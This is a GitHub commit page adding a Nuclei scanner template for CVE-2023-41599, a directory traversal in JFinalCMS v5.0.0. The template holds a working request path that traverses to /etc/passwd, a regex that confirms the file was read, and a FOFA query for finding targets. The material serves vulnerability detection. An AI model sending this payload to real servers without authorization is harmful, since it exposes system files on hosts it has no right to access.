Skip to content

Commit

Permalink
Merge pull request #10123 from projectdiscovery/pussycat0x-patch-7
Browse files Browse the repository at this point in the history
Create CVE-2023-41599.yaml
  • Loading branch information
DhiyaneshGeek committed Jun 26, 2024
2 parents 3793992 + 5f33ddc commit 2ae10ff
Showing 1 changed file with 42 additions and 0 deletions.
42 changes: 42 additions & 0 deletions http/cves/2023/CVE-2023-41599.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
id: CVE-2023-41599

info:
name: JFinalCMS v5.0.0 - Directory Traversal
author: pussycat0x
severity: medium
description: |
An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.
reference:
- https://github.com/wy876/POC/blob/main/JFinalCMS%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E(CVE-2023-41599).md
- https://github.com/wy876/POC
- https://github.com/xingchennb/POC-
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-41599
cwe-id: CWE-22
epss-score: 0.00047
epss-percentile: 0.17113
cpe: cpe:2.3:a:jfinalcms_project:jfinalcms:5.0.0:*:*:*:*:*:*:*
metadata:
vendor: jfinalcms_project
product: jfinalcms
fofa-query: body="content=\"JreCms"
tags: cve,cve2023,jrecms

http:
- method: GET
path:
- "{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"

matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200

0 comments on commit 2ae10ff

Please sign in to comment.